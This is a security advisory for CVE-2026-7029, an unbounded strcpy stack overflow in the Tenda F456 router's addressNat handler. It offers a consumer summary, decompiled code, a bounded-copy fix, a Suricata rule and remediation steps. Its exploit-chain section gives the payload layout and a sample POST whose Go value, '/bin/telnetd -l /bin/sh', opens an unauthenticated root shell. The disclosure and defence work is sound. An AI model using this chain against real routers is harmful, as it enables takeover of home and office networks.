CVE-2026-7029: Tenda F456 addressNat Stack Overflow via Unbounded strcpy
fromaddressNat() in Tenda F456 1.0.0.5 copies attacker-controlled POST parameters into fixed-size stack buffers without bounds checks, enabling unauthenticated RCE from the LAN.
A serious security flaw has been discovered in Tenda F456 routers, which are popular budget-friendly wifi devices sold worldwide. The vulnerability allows hackers to remotely take control of your router without needing any password — they just need to send specially crafted data to the device and it will do whatever they want.
Think of it like this: your router has a security guard checking who comes through the door, but the guard doesn't actually verify the visitor's ID properly. A hacker can slip past by sending a suspiciously long request that overwhelms the router's memory, essentially crashing its defenses and letting them in.
This matters because your router is the gateway to your home network. If someone controls it, they can spy on your internet traffic, steal passwords, inject malware into your devices, or use your connection to launch attacks on others. You might not even notice it's happening.
Who's at risk? Anyone using a Tenda F456 router running firmware version 1.0.0.5 is vulnerable. This includes home users, small offices, and potentially some business networks that picked these routers for their low cost.
Here's what you should do right now:
First, check if you own this specific router model and firmware version — you can usually find this in your router's settings under "System Information" or "About." If you do, contact Tenda's support immediately asking for a firmware update, or consider replacing the router if updates aren't available soon.
Second, as a general practice, change your router's default admin password immediately if you haven't already. Many people leave these unchanged, making other vulnerabilities easier to exploit.
Third, consider moving sensitive activities like online banking to a mobile device on cellular data rather than your home wifi, at least until this is patched.
[Figure: attack flow for CVE-2026-7029 (buffer overflow)]
Vulnerability Overview
CVE-2026-7029 is a stack-based buffer overflow in the Tenda F456 router firmware version 1.0.0.5. The vulnerability exists in the HTTP POST handler for /goform/addressNat, specifically inside the function fromaddressNat(). An attacker on the local network — or remotely if the management interface is exposed — can submit an oversized menufacturer or Go parameter to overwrite the saved return address on the stack, gaining arbitrary code execution under the httpd process, which typically runs as root on these devices.
The CVSS score of 8.8 (HIGH) reflects network accessibility, low attack complexity, no required privileges, and full CIA impact. A public proof-of-concept is available.
Affected Component
The vulnerable binary is httpd, the embedded web server bundled with the Tenda F456 firmware. All known builds of version 1.0.0.5 are affected. The NAT address management handler is registered at router startup and services POST requests routed to /goform/addressNat. Parameter extraction is handled via the firmware's internal CGI helper websGetVar(), which returns a raw pointer into the HTTP body buffer with no length metadata propagated to the caller.
Root Cause Analysis
The fromaddressNat() function allocates fixed-size buffers on the stack for the menufacturer and Go form fields, then copies the raw attacker-controlled string directly using strcpy(). No length validation occurs between websGetVar() returning the pointer and the copy operation.
// Decompiled pseudocode — fromaddressNat()
// File: httpd (Tenda F456 1.0.0.5, MIPS32 LE)
int fromaddressNat(webs_t wp, int argc, char **argv) {
    char manufacturer_buf[64];   // stack buffer, fixed size
    char go_buf[64];             // stack buffer, fixed size
    char rule_entry[128];        // downstream scratch buffer
    int rule_count;
    char *p_manufacturer;
    char *p_go;

    // websGetVar returns a raw pointer into the HTTP body — no length
    p_manufacturer = websGetVar(wp, "menufacturer", "");
    p_go = websGetVar(wp, "Go", "");

    // BUG: no bounds check before copy; attacker controls length entirely
    strcpy(manufacturer_buf, p_manufacturer);   // overflows at >64 bytes
    strcpy(go_buf, p_go);                       // overflows at >64 bytes

    rule_count = atoi(websGetVar(wp, "entrys", "0"));

    // Downstream processing — never reached if overflow redirects control
    build_nat_rule(rule_entry, manufacturer_buf, go_buf, rule_count);
    nvram_set("nat_manufacturer", rule_entry);
    websWrite(wp, "HTTP/1.0 200 OK\r\n\r\n");
    websDone(wp, 200);
    return 0;
}
The stack layout on a typical MIPS32 ABI call frame places manufacturer_buf at a negative offset from the saved $ra (return address). A 64-byte buffer with the return address roughly 192 bytes above the buffer base means an overflow of as little as ~128 bytes of padding plus 4 bytes of payload overwrites $ra cleanly.
Root cause: fromaddressNat() calls strcpy() into a 64-byte stack buffer using a length-unbounded pointer returned directly from websGetVar(), with no intervening bounds check.
Memory Layout
The approximate stack frame for fromaddressNat() under the MIPS O32 calling convention:
Because httpd on the Tenda F456 is statically linked against uClibc with no PIE and ASLR is absent on the MIPS target, gadget addresses are fixed per firmware build. Stack canaries are not present in the affected binary. A straightforward ret2libc or ROP chain to system() is viable.
EXPLOIT CHAIN:
  1. Identify firmware build — confirm version 1.0.0.5 via /goform/GetRouterStatus
     or banner; extract gadget offsets from static httpd binary.
  2. Craft POST body:
       menufacturer = [64 bytes padding]           // fills manufacturer_buf
                    + [128 bytes padding]          // traverses rule_entry
                    + [64 bytes padding]           // traverses go_buf
                    + [4 bytes: saved $s0 value]   // preserve or clobber
                    + [4 bytes: saved $s1 value]
                    + [4 bytes: saved $s2 value]
                    + [4 bytes: target $ra]        // e.g., ROP gadget or system()
       Go = "/bin/telnetd -l /bin/sh"              // command string in go_buf
  3. Deliver request — no authentication required on default LAN config:
       POST /goform/addressNat HTTP/1.1
       Host: 192.168.0.1
       Content-Type: application/x-www-form-urlencoded
       Content-Length:

       menufacturer=&Go=/bin/telnetd+-l+/bin/sh&entrys=1
  4. strcpy() in fromaddressNat() copies payload, overwriting saved $ra with
     ROP gadget address pointing into uClibc's system() trampoline.
  5. Function epilogue restores $ra from stack, executes `jr $ra` — control
     transferred to attacker-controlled address.
  6. system() executes Go parameter value ("/bin/telnetd -l /bin/sh"),
     binding an unauthenticated root shell on TCP/23.
Even without ROP, a simple ret2system works because the Go buffer, written before manufacturer_buf is overflowed, sits at a known static offset and contains the command string at the time of the jump.
The correct fix introduces an explicit length check using strnlen() on the value returned by websGetVar() before any copy, and replaces strcpy() with the bounded strncpy() variant. An alternative — preferred in modern embedded firmware — is to sanitize at the websGetVar() layer itself and return a pre-truncated string.
A defense-in-depth measure would also enforce input validation at the HTTP layer — rejecting requests where any single parameter value exceeds a reasonable maximum (e.g., 256 bytes) before dispatch to the CGI handler.
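The following is an added example written for this analysis, not Tenda's firmware code: the bounded copy that fromaddressNat() should perform (strnlen() check, then a terminated strncpy()), plus the pre-dispatch per-value length gate described above. websGetVar() and websWrite() are stood in for by plain C strings and a returned status code; copy_param_bounded(), form_values_within() and fromaddressNat_fixed() are hypothetical names.

```c
/* Added example for this write-up (not Tenda's code): bounded copy for the
 * fromaddressNat() fields plus the HTTP-layer per-value length gate. */
#define _POSIX_C_SOURCE 200809L
#include <string.h>

#define FIELD_MAX 64   /* size of manufacturer_buf / go_buf in fromaddressNat() */

/* Copy src into dst only if it fits with its NUL. strnlen() never scans past
 * dstsz bytes, so an oversized value is rejected before anything is written;
 * strncpy() alone does not terminate a value of exactly dstsz-1 bytes, so
 * the terminator is set explicitly. Returns 0 on success, -1 if too long. */
static int copy_param_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strnlen(src, dstsz);
    if (n >= dstsz)
        return -1;
    strncpy(dst, src, dstsz - 1);
    dst[dstsz - 1] = '\0';
    return 0;
}

/* Defence in depth: 1 if every value in a urlencoded body (text after '='
 * up to the next '&' or end of body) is at most max_value bytes, else 0. */
static int form_values_within(const char *body, size_t max_value)
{
    const char *p = body;
    while (*p) {
        const char *amp = strchr(p, '&');
        const char *end = amp ? amp : p + strlen(p);
        const char *eq  = memchr(p, '=', (size_t)(end - p));
        if (eq && (size_t)(end - (eq + 1)) > max_value)
            return 0;
        p = amp ? amp + 1 : end;
    }
    return 1;
}

/* Patched handler shape: returns the HTTP status it would send. The copies
 * only happen once both values are known to fit their 64-byte buffers. */
static int fromaddressNat_fixed(const char *manufacturer, const char *go)
{
    char manufacturer_buf[FIELD_MAX];
    char go_buf[FIELD_MAX];
    if (copy_param_bounded(manufacturer_buf, sizeof manufacturer_buf, manufacturer) ||
        copy_param_bounded(go_buf, sizeof go_buf, go))
        return 400;   /* oversized value: refuse the request, nothing copied */
    /* build_nat_rule()/nvram_set() would run here on bounded data */
    return 200;
}
```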
Detection and Indicators
On the wire, exploitation attempts are identifiable by anomalously large POST bodies to /goform/addressNat with a menufacturer or Go field exceeding 64 bytes. Legitimate use of this endpoint involves short manufacturer strings and simple navigation targets.
DETECTION SIGNATURES:
Network (Suricata sticky-buffer syntax; Snort users substitute the http_method/http_uri/http_client_body buffers):
    alert http any any -> $HOME_NET 80 ( \
        msg:"CVE-2026-7029 Tenda F456 addressNat overflow attempt"; \
        flow:established,to_server; \
        http.method; content:"POST"; \
        http.uri; content:"/goform/addressNat"; \
        http.request_body; content:"menufacturer="; \
        pcre:"/(?:^|&)(?:menufacturer|Go)=[^&]{65}/"; \
        sid:20267029; rev:1; \
    )
    The pcre matches a menufacturer or Go value of 65 or more bytes, one byte past the 64-byte stack buffer. Percent-encoded values decode shorter than they appear on the wire, so treat a hit as a trigger for review rather than proof of overflow.
Host (filesystem indicators post-exploitation):
- Unexpected listener on TCP/23 (telnetd): `netstat -tnlp | grep :23`
- /tmp/sh or /tmp/*.elf dropped by stage-2 payload
- Anomalous httpd child processes with shell ancestry
Syslog pattern (if logging enabled):
httpd: segfault or watchdog reset immediately following POST to addressNat
Remediation
Primary: Apply firmware update from Tenda when available. Monitor the vendor advisory page for build 1.0.0.6 or later.
Interim mitigations:
- Restrict access to the router management interface (port 80/443) to trusted LAN hosts only via ACL or firewall rule.
- Disable remote management if enabled — the attack surface drops to LAN-only, requiring physical or prior network access.
- Monitor for unsolicited telnet listeners or unexpected outbound connections from the gateway IP.
- Where the device sits behind a CPE with its own firewall, ensure the management VLAN is isolated from untrusted client segments.
There is no viable workaround that preserves NAT address management functionality while fully neutralizing the vulnerability short of patching the binary — the parameter is required for the feature and the copy path is unconditional.